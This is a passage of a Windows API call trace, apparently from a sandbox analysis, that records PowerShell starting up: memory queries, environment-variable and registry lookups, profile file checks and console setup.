nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.242] CoTaskMemFree (pv=0x22fde0) [0069.242] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.243] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.307] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.314] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.314] CoTaskMemFree (pv=0x22fde0) [0069.544] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x230220 [0069.545] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x230330 [0069.700] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.800] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.802] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.802] VirtualQuery (in: lpAddress=0x12a1c0, lpBuffer=0x12b080, dwLength=0x30 | out: lpBuffer=0x12b080*(BaseAddress=0x12a000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.840] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.841] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.842] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.843] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.844] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.844] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.845] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.846] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.847] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.847] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.847] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.847] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.847] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.847] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.848] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.849] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.849] VirtualQuery (in: lpAddress=0x12b770, lpBuffer=0x12c630, dwLength=0x30 | out: lpBuffer=0x12c630*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.850] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.850] CoTaskMemFree (pv=0x230440) [0069.852] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.852] CoTaskMemFree (pv=0x230440) [0069.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.871] VirtualQuery (in: lpAddress=0x12ba20, lpBuffer=0x12c8e0, dwLength=0x30 | out: lpBuffer=0x12c8e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.872] VirtualQuery (in: lpAddress=0x12ba20, lpBuffer=0x12c8e0, dwLength=0x30 | out: lpBuffer=0x12c8e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.872] VirtualQuery (in: lpAddress=0x12b270, lpBuffer=0x12c130, dwLength=0x30 | out: lpBuffer=0x12c130*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.872] VirtualQuery (in: lpAddress=0x12b270, lpBuffer=0x12c130, dwLength=0x30 | out: lpBuffer=0x12c130*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.872] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d878 | out: phkResult=0x12d878*=0x344) returned 0x0 [0069.872] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7fc, lpData=0x0, lpcbData=0x12d7f8*=0x0 | out: lpType=0x12d7fc*=0x1, lpData=0x0, lpcbData=0x12d7f8*=0x56) returned 0x0 [0069.873] CoTaskMemAlloc (cb=0x5a) returned 0x2d7200 [0069.873] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7cc, lpData=0x2d7200, lpcbData=0x12d7c8*=0x56 | out: lpType=0x12d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d7c8*=0x56) returned 0x0 [0069.873] CoTaskMemFree (pv=0x2d7200) [0069.873] RegCloseKey (hKey=0x344) returned 0x0 [0069.873] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d878 | out: phkResult=0x12d878*=0x344) returned 0x0 [0069.873] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7fc, lpData=0x0, lpcbData=0x12d7f8*=0x0 | out: lpType=0x12d7fc*=0x1, lpData=0x0, lpcbData=0x12d7f8*=0x56) returned 0x0 [0069.873] CoTaskMemAlloc (cb=0x5a) returned 0x2d7200 [0069.873] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7cc, lpData=0x2d7200, lpcbData=0x12d7c8*=0x56 | out: lpType=0x12d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d7c8*=0x56) returned 0x0 [0069.873] CoTaskMemFree (pv=0x2d7200) [0069.873] RegCloseKey (hKey=0x344) returned 0x0 [0069.874] CoTaskMemAlloc (cb=0x20c) returned 0x2bd090 [0069.874] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2bd090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0069.874] CoTaskMemFree (pv=0x2bd090) [0069.874] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0069.874] CoTaskMemAlloc (cb=0x20c) returned 0x2bd090 [0069.874] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2bd090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0069.874] CoTaskMemFree (pv=0x2bd090) [0069.874] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0069.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0069.875] SetErrorMode (uMode=0x1) returned 0x1 [0069.875] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7e0 | out: lpFileInformation=0x12d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.875] SetErrorMode (uMode=0x1) returned 0x1 [0069.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0069.875] SetErrorMode (uMode=0x1) returned 0x1 [0069.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7e0 | out: lpFileInformation=0x12d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.876] SetErrorMode (uMode=0x1) returned 0x1 [0069.876] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0069.876] SetErrorMode (uMode=0x1) returned 0x1 [0069.876] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7e0 | out: lpFileInformation=0x12d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.877] SetErrorMode (uMode=0x1) returned 0x1 [0069.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0069.877] SetErrorMode (uMode=0x1) returned 0x1 [0069.877] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7e0 | out: lpFileInformation=0x12d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0069.877] SetErrorMode (uMode=0x1) returned 0x1 [0069.878] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.878] CoTaskMemFree (pv=0x230440) [0069.889] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0069.896] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0069.897] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d7c0 | out: lpConsoleScreenBufferInfo=0x12d7c0) returned 1 [0069.903] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0069.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x12d7c0 | out: lpConsoleScreenBufferInfo=0x12d7c0) returned 1 [0069.908] ReadFile (in: hFile=0xe4, lpBuffer=0x2cfd2d0, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x12d638, lpOverlapped=0x0 | out: lpBuffer=0x2cfd2d0*, lpNumberOfBytesRead=0x12d638*=0x75, lpOverlapped=0x0) returned 1 [0069.913] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0069.914] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x12d7c0 | out: lpConsoleScreenBufferInfo=0x12d7c0) returned 1 [0069.914] CloseHandle (hObject=0xf) returned 1 [0069.918] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.918] CoTaskMemFree (pv=0x230440) [0069.919] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.919] CoTaskMemFree (pv=0x230440) [0069.921] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 